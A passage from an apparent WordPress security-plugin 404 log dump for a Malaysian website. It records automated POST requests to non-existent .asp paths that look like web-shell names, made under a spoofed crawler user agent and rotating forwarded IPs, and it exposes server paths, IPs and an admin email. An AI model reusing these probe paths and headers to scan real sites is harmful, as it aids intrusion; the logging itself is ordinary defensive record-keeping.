Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.232.142.51\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.232.142.51\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/SqlInn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/SqlInn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasoHPBciE@oGFkw1sci3gAAAQ4\";s:12:\"REDIRECT_URL\";s:17:\"/admin/SqlInn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"60892\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/SqlInn.asp\";s:10:\"SCRIPT_URL\";s:17:\"/admin/SqlInn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasoHPBciE@oGFkw1sci3gAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:12:\"1571498013.1\";s:12:\"REQUEST_TIME\";s:10:\"1571498013\";}}','notice','2019-10-19 15:13:35','2019-10-19 15:13:33',35341576,37143144,'http://bintara.com.my//admin/SqlInn.asp',1,0,'61.232.142.51'),(28406,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//daswf/concon.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"159.226.163.66\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"159.226.163.66\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/daswf/concon.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/daswf/concon.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasoFPBciE@oGFkw1sci2wAAAQg\";s:12:\"REDIRECT_URL\";s:17:\"/daswf/concon.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"60502\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/daswf/concon.asp\";s:10:\"SCRIPT_URL\";s:17:\"/daswf/concon.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasoFPBciE@oGFkw1sci2wAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571498004.2891\";s:12:\"REQUEST_TIME\";s:10:\"1571498004\";}}','notice','2019-10-19 15:13:26','2019-10-19 15:13:24',35268680,37069736,'http://bintara.com.my//daswf/concon.asp',1,0,'159.226.163.66'),(28405,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//daswf/concon.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.87.146.33\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.87.146.33\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/daswf/concon.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/daswf/concon.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasoDvBciE@oGFkw1sci2AAAAQ0\";s:12:\"REDIRECT_URL\";s:17:\"/daswf/concon.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"60502\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/daswf/concon.asp\";s:10:\"SCRIPT_URL\";s:17:\"/daswf/concon.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasoDvBciE@oGFkw1sci2AAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497998.2599\";s:12:\"REQUEST_TIME\";s:10:\"1571497998\";}}','notice','2019-10-19 15:13:20','2019-10-19 15:13:18',35336832,37142784,'http://bintara.com.my//daswf/concon.asp',1,0,'218.87.146.33'),(28404,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//html1/tan.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.21.233.36\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.21.233.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/html1/tan.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/html1/tan.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasn1rdRi@RFkkQCXDBOvAAAAE8\";s:12:\"REDIRECT_URL\";s:14:\"/html1/tan.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58907\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/html1/tan.asp\";s:10:\"SCRIPT_URL\";s:14:\"/html1/tan.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasn1rdRi@RFkkQCXDBOvAAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571497942.615\";s:12:\"REQUEST_TIME\";s:10:\"1571497942\";}}','notice','2019-10-19 15:12:24','2019-10-19 15:12:23',35268696,37073680,'http://bintara.com.my//html1/tan.asp',1,0,'58.21.233.36'),(28403,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//html1/tan.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.146.84.64\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.146.84.64\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/html1/tan.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/html1/tan.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasn0rdRi@RFkkQCXDBOuwAAAE4\";s:12:\"REDIRECT_URL\";s:14:\"/html1/tan.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58907\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/html1/tan.asp\";s:10:\"SCRIPT_URL\";s:14:\"/html1/tan.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasn0rdRi@RFkkQCXDBOuwAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497938.6377\";s:12:\"REQUEST_TIME\";s:10:\"1571497938\";}}','notice','2019-10-19 15:12:21','2019-10-19 15:12:19',35731512,37530464,'http://bintara.com.my//html1/tan.asp',1,0,'211.146.84.64'),(28402,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//concetotxcyr.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"203.118.216.181\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"203.118.216.181\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/concetotxcyr.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/concetotxcyr.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasnePBciE@oGFkw1scingAAAQc\";s:12:\"REDIRECT_URL\";s:17:\"/concetotxcyr.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56167\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/concetotxcyr.asp\";s:10:\"SCRIPT_URL\";s:17:\"/concetotxcyr.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasnePBciE@oGFkw1scingAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497848.4804\";s:12:\"REQUEST_TIME\";s:10:\"1571497848\";}}','notice','2019-10-19 15:10:51','2019-10-19 15:10:48',35267768,37078808,'http://bintara.com.my//concetotxcyr.asp',1,0,'203.118.216.181'),(28401,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//concetotxcyr.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"59.107.69.151\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"59.107.69.151\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/concetotxcyr.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/concetotxcyr.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasncvBciE@oGFkw1scinAAAAQU\";s:12:\"REDIRECT_URL\";s:17:\"/concetotxcyr.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56167\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/concetotxcyr.asp\";s:10:\"SCRIPT_URL\";s:17:\"/concetotxcyr.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasncvBciE@oGFkw1scinAAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497842.3647\";s:12:\"REQUEST_TIME\";s:10:\"1571497842\";}}','notice','2019-10-19 15:10:45','2019-10-19 15:10:42',35733888,37538576,'http://bintara.com.my//concetotxcyr.asp',1,0,'59.107.69.151'),(28400,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//images/img.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.237.221.105\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.237.221.105\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/images/img.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/images/img.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasnMLdRi@RFkkQCXDBOfAAAAEM\";s:12:\"REDIRECT_URL\";s:15:\"/images/img.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54980\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/images/img.asp\";s:10:\"SCRIPT_URL\";s:15:\"/images/img.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasnMLdRi@RFkkQCXDBOfAAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497777.0163\";s:12:\"REQUEST_TIME\";s:10:\"1571497777\";}}','notice','2019-10-19 15:09:39','2019-10-19 15:09:37',35340168,37140608,'http://bintara.com.my//images/img.asp',1,0,'61.237.221.105'),(28399,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//data/%23data.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"59.51.217.44\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"59.51.217.44\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/data/#data.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/data/#data.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasnH-BciE@oGFkw1sciggAAAQc\";s:12:\"REDIRECT_URL\";s:15:\"/data/#data.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53995\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/data/#data.asp\";s:10:\"SCRIPT_URL\";s:15:\"/data/#data.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasnH-BciE@oGFkw1sciggAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497759.5666\";s:12:\"REQUEST_TIME\";s:10:\"1571497759\";}}','notice','2019-10-19 15:09:22','2019-10-19 15:09:20',35339176,37141056,'http://bintara.com.my//data/%23data.asp',1,0,'59.51.217.44'),(28398,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"//siteweb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 